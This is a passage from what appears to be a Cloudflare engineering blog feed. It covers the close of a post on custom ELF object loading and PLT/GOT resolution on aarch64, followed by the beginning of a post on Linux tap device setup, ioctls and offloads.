3</a> we implemented a simplified PLT/GOT resolution. Firstly, we added a new function <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/obj.c#L35"><code>say_hello</code></a> in <code>obj.c</code>, which calls the unresolved system library function <code>puts</code>. Then we added an optional wrapper <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L73"><code>my_puts</code></a> in <code>loader.c</code>. The wrapper isn’t required; we could’ve resolved directly to the standard function, but it’s a good example of how the implementation of some functions can be overridden with custom code. In the next steps we added our own PLT/GOT resolution:</p><ul><li><p>the PLT section we replaced with a <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L340">jumptable</a></p></li><li><p>the GOT we replaced with <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238-L248">assembly instructions</a></p></li></ul><p>Basically, we created a small stub with assembly code (our <code>jumptable</code>) to resolve the global address of our <code>my_puts</code> wrapper and jump to it.</p><p>The approach for aarch64 is the same, but the <code>jumptable</code> is very different, as it consists of different assembly instructions.</p><p>The big difference here compared to the other parts is that we need to work with a 64-bit address for the GOT resolution. Our custom PLT, the <code>jumptable</code>, is placed close to the main code of <code>obj.c</code> and can operate with relative addresses as before. For the GOT, i.e. referencing the <code>my_puts</code> wrapper, we’ll use different branch instructions: <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BR--Branch-to-Register-"><code>br</code></a> or <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BLR--Branch-with-Link-to-Register-"><code>blr</code></a>. These instructions branch to an address held in a register, and aarch64 registers can hold 64-bit values.</p><p>We can check how the native PLT/GOT resolution looks in our loader’s assembly code:</p>
            <pre><code>$ objdump --disassemble --section=.text loader
...
1d2c:	97fffb45 	bl	a40 &lt;puts@plt&gt;
1d30:	f94017e0 	ldr	x0, [sp, #40]
1d34:	d63f0000 	blr	x0
...</code></pre>
            <p>The first instruction is a <code>bl</code> jump to the <code>puts@plt</code> stub. The next <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/LDR--immediate---Load-Register--immediate--"><code>ldr</code></a> instruction tells us that some value was loaded into the register <code>x0</code> from the stack. Each function has its own <a href="https://en.wikipedia.org/wiki/Call_stack#Stack_and_frame_pointers">stack frame</a> to hold its local variables. The last <code>blr</code> instruction jumps to the address stored in the <code>x0</code> register. There is a convention in the register naming: when the full 64-bit value is used, the register is named <code>x0</code>-<code>x30</code>; when only 32 bits are used, it’s named <code>w0</code>-<code>w30</code> (the value is stored in the lower 32 bits and the upper 32 bits are zeroed).</p><p>We need to do something similar — place the absolute address of our <code>my_puts</code> wrapper in some register and branch to that register. We don’t need to store the link before branching: the return will go back to <code>say_hello</code> in <code>obj.c</code>, which is why a plain <code>br</code> is enough. Let’s check the assembly of a simple C function:</p><p>hello.c:</p>
            <pre><code>#include &lt;stdint.h&gt;

void say_hello(void)
{
    uint64_t reg = 0x555555550c14;
}</code></pre>
            
            <pre><code>$ gcc -c hello.c
$ objdump --disassemble --section=.text hello.o

hello.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;say_hello&gt;:
   0:	d10043ff 	sub	sp, sp, #0x10
   4:	d2818280 	mov	x0, #0xc14                 	// #3092
   8:	f2aaaaa0 	movk	x0, #0x5555, lsl #16
   c:	f2caaaa0 	movk	x0, #0x5555, lsl #32
  10:	f90007e0 	str	x0, [sp, #8]
  14:	d503201f 	nop
  18:	910043ff 	add	sp, sp, #0x10
  1c:	d65f03c0 	ret</code></pre>
            <p>The number <code>0x555555550c14</code> is the address returned by <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238"><code>lookup_ext_function</code></a>. We’ve printed it out to use as an example, but any <a href="https://www.kernel.org/doc/html/latest/arch/arm64/memory.html">48-bit</a> hex value can be used.</p><p>In the output we see that the value was split into three parts and written into the <code>x0</code> register with three instructions: one <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOV--inverted-wide-immediate---Move--inverted-wide-immediate---an-alias-of-MOVN-"><code>mov</code></a> and two <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOVK--Move-wide-with-keep-?lang=en"><code>movk</code></a>. The documentation says that there are only 16 bits for each immediate value, but a shift can be applied (in our case a left shift, <code>lsl</code>).</p><p>However, we can’t use <code>x0</code> in our context. By <a href="https://developer.arm.com/documentation/den0024/a/The-ABI-for-ARM-64-bit-Architecture/Register-use-in-the-AArch64-Procedure-Call-Standard/Parameters-in-general-purpose-registers">convention</a> the registers <code>x0-x7</code> are caller-saved and used to pass function parameters between calls to other functions. Let’s use <code>x9</code> then.</p><p>We need to modify our loader. Firstly, let’s change the jumptable structure.</p><p>loader.c:</p>
            <pre><code>...
struct ext_jump {
	uint32_t instr[4];
};
...</code></pre>
            <p>As we saw above, we need four instructions: <code>mov</code>, <code>movk</code>, <code>movk</code>, <code>br</code>. We don’t need a stack frame, as we aren’t preserving any local variables. We just want to load the address into the register and branch to it. But we can’t write human-readable code like <code>mov  x0, #0xc14</code> into the jumptable; we need the machine representation in binary or hex, e.g. <code>d2818280</code>.</p><p>Let’s write some simple assembly code to get it:</p><p>hw.s:</p>
            <pre><code>.global _start

_start: mov     x9, #0xc14 
        movk    x9, #0x5555, lsl #16
        movk    x9, #0x5555, lsl #32
        br      x9</code></pre>
            
            <pre><code>$ as -o hw.o hw.s
$ objdump --disassemble --section=.text hw.o

hw.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;_start&gt;:
   0:	d2818289 	mov	x9, #0xc14                 	// #3092
   4:	f2aaaaa9 	movk	x9, #0x5555, lsl #16
   8:	f2caaaa9 	movk	x9, #0x5555, lsl #32
   c:	d61f0120 	br	x9</code></pre>
            <p>Almost done! But there’s one more thing to consider. Even if the value <code>0x555555550c14</code> is a real <code>my_puts</code> wrapper address, it will be different on each run if <a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR (address space layout randomization)</a> is enabled. We need to patch these instructions with the value returned by <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/3/loader.c#L238"><code>lookup_ext_function</code></a> on each run. We’ll split the obtained value into three 16-bit parts and place them into our <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOV--inverted-wide-immediate---Move--inverted-wide-immediate---an-alias-of-MOVN-"><code>mov</code></a> and <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/MOVK--Move-wide-with-keep-?lang=en"><code>movk</code></a> instructions according to the documentation, similar to what we did earlier in the second example.</p>
            <pre><code>if (symbols[symbol_idx].st_shndx == SHN_UNDEF) {
	static int curr_jmp_idx = 0;

	uint64_t addr = lookup_ext_function(strtab +  symbols[symbol_idx].st_name);
	uint32_t mov = 0b11010010100000000000000000001001 | ((addr &lt;&lt; 48) &gt;&gt; 43);
	uint32_t movk1 = 0b11110010101000000000000000001001 | (((addr &gt;&gt; 16) &lt;&lt; 48) &gt;&gt; 43);
	uint32_t movk2 = 0b11110010110000000000000000001001 | (((addr &gt;&gt; 32) &lt;&lt; 48) &gt;&gt; 43);
	jumptable[curr_jmp_idx].instr[0] = mov;         // mov  x9, #0x0c14
	jumptable[curr_jmp_idx].instr[1] = movk1;       // movk x9, #0x5555, lsl #16
	jumptable[curr_jmp_idx].instr[2] = movk2;       // movk x9, #0x5555, lsl #32
	jumptable[curr_jmp_idx].instr[3] = 0xd61f0120;  // br   x9

	symbol_address = (uint8_t *)(&amp;jumptable[curr_jmp_idx].instr[0]);
	curr_jmp_idx++;
} else {
	symbol_address = section_runtime_base(&amp;sections[symbols[symbol_idx].st_shndx]) + symbols[symbol_idx].st_value;
}
uint32_t val;
switch (type)
{
case R_AARCH64_CALL26:
	/* The mask separates opcode (6 bits) and the immediate value */
	uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
	/* S+A-P, divided by 4 */
	val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
	/* Concatenate opcode and value to get final instruction */
	*((uint32_t *)patch_offset) &amp;= mask_bl;
	val &amp;= ~mask_bl;
	*((uint32_t *)patch_offset) |= val;
	break;
...</code></pre>
            <p>In the code we take the address of the first instruction, <code>&amp;jumptable[curr_jmp_idx].instr[0]</code>, and write it into <code>symbol_address</code>. Because the <code>type</code> is still <code>R_AARCH64_CALL26</code>, it is encoded into a <code>bl</code>, a jump to a relative address, where the relative address points at our first <code>mov</code> instruction. The whole <code>jumptable</code> stub is then executed and finishes with the <code>br</code> instruction, which branches to the <code>my_puts</code> wrapper.</p><p>The final run:</p>
            <pre><code>$ gcc -o loader loader.c
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52
Executing get_hello...
get_hello() = Hello, world!
Executing get_var...
get_var() = 5
Executing set_var(42)...
Executing get_var again...
get_var() = 42
Executing say_hello...
my_puts executed
Hello, world!</code></pre>
            <p>The final code is <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/4/3">here</a>.</p>
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
    <p>There are several things we covered in this blog post. We gave a brief introduction to how a binary gets executed on Linux and how all the components are linked together. We saw a big difference between x86 and aarch64 assembly. We learned how to hook into the code and change its behavior. But as we said in the first blog post of this series, the most important thing is to remember to always think about security first. Processing external inputs should always be done with great care. Bounds and integrity checks have been omitted to keep the examples short, so readers should be aware that the code is not production-ready and is designed for educational purposes only.</p> ]]></content:encoded>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Programming]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">6bGK0NoXnHBGOjKvJ60FRu</guid>
            <dc:creator>Oxana Kharitonova</dc:creator>
        </item>
        <item>
            <title><![CDATA[Virtual networking 101: bridging the gap to understanding TAP]]></title>
            <link>https://blog.cloudflare.com/virtual-networking-101-understanding-tap/</link>
            <pubDate>Fri, 06 Oct 2023 13:05:33 GMT</pubDate>
            <description><![CDATA[ Tap devices were historically used for VPN clients. Using them for virtual machines is essentially reversing their original purpose - from traffic sinks to traffic sources. In the article I explore the intricacies of tap devices, covering topics like offloads, segmentation, and multi-queue. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5K0iKrieDwp0YkLViNDJKB/1c655399c5c70fe75c8f56f3294266a9/image1-5.png" />
            
            </figure><p>It's a never-ending effort to improve the performance of our infrastructure. As part of that quest, we wanted to squeeze as much network oomph as possible from our virtual machines. Internally for some projects we use <a href="https://firecracker-microvm.github.io/">Firecracker</a>, which is a KVM-based virtual machine manager (VMM) that runs light-weight “Micro-VM”s. Each Firecracker instance uses a tap device to communicate with the host system. Not knowing much about tap, I had to up my game. It wasn't easy, though - the documentation is messy and spread across the Internet.</p><p>Here are the notes that I wish someone had passed me when I started out on this journey!</p><p>A tap device is a virtual <b>network interface</b> that looks like an ethernet network card. Instead of having real wires plugged into it, it exposes a nice handy file descriptor to an application willing to send/receive packets. Historically tap devices were mostly used to implement VPN clients. The machine would route packets towards a <b>tap interface</b>, and a VPN client application would pick them up and process them accordingly. For example, this is what our Cloudflare WARP Linux client does. Here's how it looks on my laptop:</p>
            <pre><code>$ ip link list
...
18: CloudflareWARP: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1280 qdisc mq state UNKNOWN mode DEFAULT group default qlen 500
	link/none

$ ip tuntap list
CloudflareWARP: tun multi_queue</code></pre>
            <p>More recently tap devices started to be used by <a href="https://www.cloudflare.com/learning/cloud/what-is-a-virtual-machine/">virtual machines</a> to enable networking. The VMM (like Qemu, Firecracker, or gVisor) would open the application side of a tap and pass all the packets to the guest VM. The tap network interface would be left for the host kernel to deal with. Typically, the host would behave like a router and firewall, forwarding or NATing all the packets. This design is somewhat surprising - it's almost reversing the original use case for tap. In the VPN days tap was a traffic destination. With a VM behind it, tap looks like a traffic source.</p><p>A Linux tap device is a <b>mean creature</b>. It looks trivial — a virtual network interface, with a file descriptor behind it. However, it's <b>surprisingly hard</b> to get it to perform well. The Linux networking stack is optimized for packets handled by a physical network card, not a userspace application. Over the years, though, the Linux tap interface grew in features, and nowadays it's possible to get good performance out of it. Later I'll explain how to use the Linux tap API in a modern way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79hvP3TXwPib9DE9leEJbE/7f81ee55560cfdff5b7df7419adc91c5/Screenshot-2023-10-05-at-2.42.49-PM.png" />
            
            </figure><p>Source: DALL-E</p>
    <div>
      <h2>To tun or to tap?</h2>
      <a href="#to-tun-or-to-tap">
        
      </a>
    </div>
    <p>The interface is <a href="https://docs.kernel.org/networking/tuntap.html">called "the universal tun/tap"</a> in the kernel. The "tun" variant, accessible via the IFF_TUN flag, looks like a point-to-point link. There are no L2 Ethernet headers. Since most modern networks are Ethernet, this is a bit less intuitive to set up for a novice user. Most importantly, projects like Firecracker and gVisor do expect L2 headers.</p><p>"Tap", with the IFF_TAP flag, is the one which has Ethernet headers, and has been getting all the attention lately. If you are like me and always forget which one is which, you can use this  AI-generated rhyme (check out <a href="/writing-poems-using-llama-2-on-workers-ai/">WorkersAI/LLama</a>) to help to remember:</p><p><i>Tap is like a switch,</i><i>Ethernet headers it'll hitch.</i><i>Tun is like a tunnel,</i><i>VPN connections it'll funnel.</i><i>Ethernet headers it won't hold,</i><i>Tap uses, tun does not, we're told.</i></p>
    <div>
      <h2>Listing devices</h2>
      <a href="#listing-devices">
        
      </a>
    </div>
    <p>Tun/tap devices are natively supported by iproute2 tooling. Typically, one creates a device with <b>ip tuntap add</b> and lists it with <b>ip tuntap list</b>:</p>
            <pre><code>$ sudo ip tuntap add mode tap user marek group marek name tap0
$ ip tuntap list
tap0: tap persist user 1000 group 1000</code></pre>
            <p>Alternatively, it's possible to look at the <code>/sys/devices/virtual/net/&lt;ifr_name&gt;/tun_flags</code> file.</p>
    <div>
      <h2>Tap device setup</h2>
      <a href="#tap-device-setup">
        
      </a>
    </div>
    <p>To open or create a new device, you first need to open <code>/dev/net/tun</code> which is called a "clone device":</p>
            <pre><code>    /* First, whatever you do, the device /dev/net/tun must be
     * opened read/write. That device is also called the clone
     * device, because it's used as a starting point for the
     * creation of any tun/tap virtual interface. */
    char *clone_dev_name = "/dev/net/tun";
    int tap_fd = open(clone_dev_name, O_RDWR | O_CLOEXEC);
    if (tap_fd &lt; 0) {
   	 error(-1, errno, "open(%s)", clone_dev_name);
    }</code></pre>
            <p>With the clone device file descriptor we can now instantiate a specific tap device by name:</p>
            <pre><code>    struct ifreq ifr = {};
    strncpy(ifr.ifr_name, tap_name, IFNAMSIZ);
    ifr.ifr_flags = IFF_TAP | IFF_NO_PI | IFF_VNET_HDR;
    int r = ioctl(tap_fd, TUNSETIFF, &amp;ifr);
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETIFF)");
    }</code></pre>
            <p>If <b>ifr_name</b> is empty or names a device that doesn't exist, a new tap device is created. Otherwise, an existing device is opened. When opening existing devices, flags like IFF_MULTI_QUEUE must match the way the device was created, or EINVAL is returned. It's a good idea to try to reopen the device with the multi queue setting flipped on an EINVAL error.</p><p>The <b>ifr_flags</b> can have the following bits set:</p><table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>IFF_TAP / IFF_TUN</span></p></td><td><p><span>Already discussed.</span></p></td></tr><tr><td><p><span>IFF_NO_CARRIER</span></p></td><td><p><span>Holding an open tap device file descriptor sets the Ethernet interface CARRIER flag up. In some cases it might be desired to delay that until a TUNSETCARRIER call.</span></p></td></tr><tr><td><p><span>IFF_NO_PI</span></p></td><td><p><span>Historically each packet on tap had a "struct tun_pi" 4 byte prefix. There are now better alternatives and this option disables this prefix.</span></p></td></tr><tr><td><p><span>IFF_TUN_EXCL</span></p></td><td><p><span>Ensures a new device is created. Returns EBUSY if the device exists.</span></p></td></tr><tr><td><p><span>IFF_VNET_HDR</span></p></td><td><p><span>Prepend "</span><a href="https://elixir.bootlin.com/linux/v6.4.6/source/include/uapi/linux/virtio_net.h#L187"><span>struct virtio_net_hdr</span></a><span>" before the RX and TX packets, should be followed by ioctl(TUNSETVNETHDRSZ).</span></p></td></tr><tr><td><p><span>IFF_MULTI_QUEUE</span></p></td><td><p><span>Use multi queue tap, see below.</span></p></td></tr><tr><td><p><span>IFF_NAPI / IFF_NAPI_FRAGS</span></p></td><td><p><span>See below.</span></p></td></tr></tbody></table><p>You almost always want IFF_TAP, IFF_NO_PI, IFF_VNET_HDR flags and perhaps sometimes IFF_MULTI_QUEUE.</p>
    <div>
      <h2>The curious IFF_NAPI</h2>
      <a href="#the-curious-iff_napi">
        
      </a>
    </div>
    <p>Judging by the <a href="https://www.mail-archive.com/netdev@vger.kernel.org/msg189704.html">original patchset introducing IFF_NAPI and IFF_NAPI_FRAGS</a>, these flags were introduced to increase code coverage of syzkaller. However, later work indicates there were <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fb3f903769e805221eb19209b3d9128d398038a1">performance benefits when doing XDP on tap</a>. IFF_NAPI enables a dedicated NAPI instance for packets written from an application into a tap. Besides allowing XDP, it also allows packets to be batched and GRO-ed. Otherwise, a backlog NAPI is used.</p>
    <div>
      <h2>A note on buffer sizes</h2>
      <a href="#a-note-on-buffer-sizes">
        
      </a>
    </div>
    <p>Internally, a tap device is just a pair of packet queues. It's exposed as a network interface towards the host, and a file descriptor, a character device, towards the application. The queue in the direction of application (tap TX queue) is of size <b>txqueuelen</b> packets, controlled by an interface parameter:</p>
            <pre><code>$ ip link set dev tap0 txqueuelen 1000
$ ip -s link show dev tap0
26: tap0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 ... qlen 1000
	RX:  bytes packets errors dropped  missed   mcast      	 
         	0   	0  	0   	0   	0   	0
	TX:  bytes packets errors dropped carrier collsns      	 
       	266   	3  	0  	66   	0   	0</code></pre>
            <p>In "ip link" statistics the column "<b>TX dropped</b>" indicates that the tap application was too slow and the queue space was exhausted.</p><p>In the other direction - the interface RX queue, from the application towards the host - the queue size limit is measured in bytes and controlled by the TUNSETSNDBUF ioctl. The <a href="https://elixir.bootlin.com/qemu/v8.1.1/source/net/tap-linux.c#L120">qemu comment discusses</a> this setting; however, it's not easy to cause this queue to overflow. See this <a href="https://bugzilla.redhat.com/show_bug.cgi?id=508861">discussion for details</a>.</p>
    <div>
      <h2>vnethdr size</h2>
      <a href="#vnethdr-size">
        
      </a>
    </div>
    <p>After the device is opened, a typical scenario is to set up VNET_HDR size and offloads. Typically the VNETHDRSZ should be set to 12:</p>
            <pre><code>    len = 12;
    r = ioctl(tap_fd, TUNSETVNETHDRSZ, &amp;(int){len});
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETVNETHDRSZ)");
    }</code></pre>
            <p>Sensible values are {10, 12, 20}, which are derived from the <a href="https://docs.oasis-open.org/virtio/virtio/v1.2/csd01/virtio-v1.2-csd01.html">virtio spec</a>. 12 bytes makes room for the following header (little endian):</p>
            <pre><code>struct virtio_net_hdr_v1 {
#define VIRTIO_NET_HDR_F_NEEDS_CSUM  1    /* Use csum_start, csum_offset */
#define VIRTIO_NET_HDR_F_DATA_VALID  2    /* Csum is valid */
    u8 flags;
#define VIRTIO_NET_HDR_GSO_NONE      0    /* Not a GSO frame */
#define VIRTIO_NET_HDR_GSO_TCPV4     1    /* GSO frame, IPv4 TCP (TSO) */
#define VIRTIO_NET_HDR_GSO_UDP       3    /* GSO frame, IPv4 UDP (UFO) */
#define VIRTIO_NET_HDR_GSO_TCPV6     4    /* GSO frame, IPv6 TCP */
#define VIRTIO_NET_HDR_GSO_UDP_L4    5    /* GSO frame, IPv4 &amp; IPv6 UDP (USO) */
#define VIRTIO_NET_HDR_GSO_ECN       0x80 /* TCP has ECN set */
    u8 gso_type;
    u16 hdr_len;     /* Ethernet + IP + tcp/udp hdrs */
    u16 gso_size;    /* Bytes to append to hdr_len per frame */
    u16 csum_start;
    u16 csum_offset;
    u16 num_buffers;
};</code></pre>
            
    <div>
      <h2>offloads</h2>
      <a href="#offloads">
        
      </a>
    </div>
    <p>To enable offloads use the ioctl:</p>
            <pre><code>    unsigned off_flags = TUN_F_CSUM | TUN_F_TSO4 | TUN_F_TSO6;
    int r = ioctl(tap_fd, TUNSETOFFLOAD, off_flags);
    if (r != 0) {
   	 error(-1, errno, "ioctl(TUNSETOFFLOAD)");
    }</code></pre>
            <p>Here are the allowed bit values. Each bit confirms that the userspace application can receive packets with the given offload:</p><table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUN_F_CSUM</span></p></td><td><p><span>L4 packet checksum offload</span></p></td></tr><tr><td><p><span>TUN_F_TSO4</span></p></td><td><p><span>TCP Segmentation Offload - TSO for IPv4 packets</span></p></td></tr><tr><td><p><span>TUN_F_TSO6</span></p></td><td><p><span>TSO for IPv6 packets</span></p></td></tr><tr><td><p><span>TUN_F_TSO_ECN</span></p></td><td><p><span>TSO with ECN bits</span></p></td></tr><tr><td><p><span>TUN_F_UFO</span></p></td><td><p><span>UDP Fragmentation offload - UFO packets. Deprecated.</span></p></td></tr><tr><td><p><span>TUN_F_USO4</span></p></td><td><p><span>UDP Segmentation offload - USO for IPv4 packets</span></p></td></tr><tr><td><p><span>TUN_F_USO6</span></p></td><td><p><span>USO for IPv6 packets</span></p></td></tr></tbody></table><p>Generally, offloads are extra packet features the tap application can deal with. Details of the offloads used by the sender are set on each packet in the vnethdr prefix.</p>
    <div>
      <h2>Checksum offload TUN_F_CSUM</h2>
      <a href="#checksum-offload-tun_f_csum">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5QEojUsAvj7VueXmGRSexc/37671b9c92dcc7f6c40bf572cd6e73dc/image4.jpg" />
            
            </figure><p>Structure of a typical UDP packet received over tap.</p><p>Let's start with the checksumming offload. The TUN_F_CSUM offload saves the kernel some work by pushing the checksum processing down the path. Applications which set that flag are indicating they can handle checksum validation. For example, with this offload a UDP IPv4 packet will have:</p><ul><li><p>vnethdr flags will have VIRTIO_NET_HDR_F_NEEDS_CSUM set</p></li><li><p>hdr_len would be 42 (14+20+8)</p></li><li><p>csum_start 34 (14+20)</p></li><li><p>and csum_offset 6 (UDP header checksum is 6 bytes into L4)</p></li></ul><p>This is illustrated above.</p><p>Supporting checksum offload is needed for further offloads.</p>
    <div>
      <h2>TUN_F_CSUM is a must</h2>
      <a href="#tun_f_csum-is-a-must">
        
      </a>
    </div>
    <p>Consider this code:</p>
            <pre><code>s = socket(AF_INET, SOCK_DGRAM)
s.setsockopt(SOL_UDP, UDP_SEGMENT, 1400)
s.sendto(b"x", ("10.0.0.2", 5201))     # Would you expect EIO ?</code></pre>
            <p>This simple code produces a packet. When directed at a tap device, it will surprisingly yield an EIO "Input/output error". This weird behavior happens when the tap is opened without TUN_F_CSUM and the application is sending GSO / UDP_SEGMENT frames. Tough luck. It might be considered a kernel bug, and we're thinking about fixing it. However, in the meantime, everyone using tap should just set the TUN_F_CSUM bit.</p>
    <div>
      <h2>Segmentation offloads</h2>
      <a href="#segmentation-offloads">
        
      </a>
    </div>
    <p>We wrote about <a href="/accelerating-udp-packet-transmission-for-quic/">UDP_SEGMENT</a> in the past. In short: on Linux an application can handle many packets with a single send/recv, as long as they have identical length.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/31mztfk8fZtP46WzeFrcID/4dd98352343ffafd1cf7d62847c06904/image2-4.png" />
            
            </figure><p>With UDP_SEGMENT a single send() can transfer multiple packets.</p><p>Tap devices support offloads which expose that very functionality. With the TUN_F_TSO4 and TUN_F_TSO6 flags the tap application signals it can deal with long packet trains. Note that with these offloads the application must be ready to receive much larger buffers - up to 65507 bytes for IPv4 and 65527 for IPv6.</p><p>The TSO4/TSO6 flags enable long packet trains for <a href="https://www.cloudflare.com/learning/ddos/glossary/tcp-ip/">TCP</a> and have been supported for a long time. More recently the TUN_F_USO4 and TUN_F_USO6 bits were introduced for <a href="https://www.cloudflare.com/learning/ddos/glossary/user-datagram-protocol-udp/">UDP</a>. When any of these offloads are used, the <b>gso_type</b> contains the relevant offload type and <b>gso_size</b> holds the segment size within the GRO packet train.</p><p>TUN_F_UFO is a UDP fragmentation offload which is deprecated.</p><p>By setting TUNSETOFFLOAD, the application is telling the kernel which offloads it's able to handle on the read() side of a tap device. If the ioctl(TUNSETOFFLOAD) succeeds, the application can assume the kernel supports the same offloads for packets in the other direction.</p>
    <div>
      <h2>Bug in rx-udp-gro-forwarding - TUN_F_USO4</h2>
      <a href="#bug-in-rx-udp-gro-forwarding-tun_f_uso4">
        
      </a>
    </div>
    <p>When working with tap and offloads it's useful to inspect <b>ethtool</b>:</p>
            <pre><code>$ ethtool -k tap0 | egrep -v fixed
tx-checksumming: on
    tx-checksum-ip-generic: on
scatter-gather: on
    tx-scatter-gather: on
    tx-scatter-gather-fraglist: on
tcp-segmentation-offload: on
    tx-tcp-segmentation: on
generic-segmentation-offload: on
generic-receive-offload: on
tx-udp-segmentation: on
rx-gro-list: off
rx-udp-gro-forwarding: off</code></pre>
            <p>With ethtool we can see the enabled offloads and disable them as needed.</p><p>While toying with UDP Segmentation Offload (USO) I've noticed that when packet trains from tap are forwarded to a real network interface, sometimes they seem badly packetized. See the <a href="https://lore.kernel.org/all/CAJPywTKDdjtwkLVUW6LRA2FU912qcDmQOQGt2WaDo28KzYDg+A@mail.gmail.com/">netdev discussion</a>, and the <a href="https://lore.kernel.org/netdev/ZK9ZiNMsJX8+1F3N@debian.debian/T/#m9f532bb5463b89d997c5d16c78490ceeccb4497f">proposed fix</a>. In any case - beware of this bug, and maybe consider doing "ethtool -K tap0 rx-udp-gro-forwarding off".</p>
    <div>
      <h2>Miscellaneous setsockopts</h2>
      <a href="#miscellaneous-setsockopts">
        
      </a>
    </div>
    
    <div>
      <h4>Setup related socket options</h4>
      <a href="#setup-related-socket-options">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNGETFEATURES</span></p></td><td><p><span>Return vector of IFF_* constants that the kernel supports. Typically used to detect the host support of: IFF_VNET_HDR, IFF_NAPI and IFF_MULTI_QUEUE.</span></p></td></tr><tr><td><p><span>TUNSETIFF</span></p></td><td><p><span>Takes "struct ifreq", sets up a tap device, fills in the name if empty.</span></p></td></tr><tr><td><p><span>TUNGETIFF</span></p></td><td><p><span>Returns a "struct ifreq" containing the device's current name and flags.</span></p></td></tr><tr><td><p><span>TUNSETPERSIST</span></p></td><td><p><span>Sets TUN_PERSIST flag, if you want the device to remain in the system after the tap_fd is closed.</span></p></td></tr><tr><td><p><span>TUNSETOWNER, TUNSETGROUP</span></p></td><td><p><span>Set uid and gid that can own the device.</span></p></td></tr><tr><td><p><span>TUNSETLINK</span></p></td><td><p><span>Set the Ethernet link type for the device. The device must be down. See ARPHRD_* constants. For tap it defaults to ARPHRD_ETHER.</span></p></td></tr><tr><td><p><span>TUNSETOFFLOAD</span></p></td><td><p><span>As documented above.</span></p></td></tr><tr><td><p><span>TUNGETSNDBUF, TUNSETSNDBUF</span></p></td><td><p><span>Get/set send buffer. The default is INT_MAX.</span></p></td></tr><tr><td><p><span>TUNGETVNETHDRSZ, TUNSETVNETHDRSZ</span></p></td><td><p><span>Already discussed.</span></p></td></tr><tr><td><p><span>TUNSETIFINDEX</span></p></td><td><p><span>Set interface index (ifindex), </span><a href="https://patchwork.ozlabs.org/project/netdev/patch/51B99946.3000703@parallels.com/"><span>useful in checkpoint-restore</span></a><span>.</span></p></td></tr><tr><td><p><span>TUNSETCARRIER</span></p></td><td><p><span>Set the carrier state of an interface, as discussed earlier, useful with IFF_NO_CARRIER.</span></p></td></tr><tr><td><p><span>TUNGETDEVNETNS</span></p></td><td><p><span>Return an fd of a net namespace that the interface belongs to.</span></p></td></tr></tbody></table>
    <div>
      <h4>Filtering related socket options</h4>
      <a href="#filtering-related-socket-options">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNSETTXFILTER</span></p></td><td><p><span>Takes "struct tun_filter" which limits the dst mac addresses that can be delivered to the application.</span></p></td></tr><tr><td><p><span>TUNATTACHFILTER, TUNDETACHFILTER, TUNGETFILTER</span></p></td><td><p><span>Attach/detach/get classic BPF filter for packets going to application. Takes "struct sock_fprog".</span></p><br /></td></tr><tr><td><p><span>TUNSETFILTEREBPF</span></p></td><td><p><span>Set an eBPF filter on a tap device. This is independent of the classic BPF above.</span></p></td></tr></tbody></table>
    <div>
      <h4>Multi queue related socket options</h4>
      <a href="#multi-queue-related-socket-options">
        
      </a>
    </div>
    <table><colgroup><col></col><col></col></colgroup><tbody><tr><td><p><span>TUNSETQUEUE</span></p></td><td><p><span>Used to set IFF_DETACH_QUEUE and IFF_ATTACH_QUEUE for multiqueue.</span></p></td></tr><tr><td><p><span>TUNSETSTEERINGEBPF</span></p></td><td><p><span>Set an eBPF program for selecting a specific tap queue, in the direction towards the application. This is useful if you want to ensure some traffic is sticky to a specific application thread. The eBPF program takes a "struct __sk_buff" and returns an int. The selected queue is the return value, truncated to u16, modulo the number of queues.</span></p></td></tr></tbody></table>
    <div>
      <h2>Single queue speed</h2>
      <a href="#single-queue-speed">
        
      </a>
    </div>
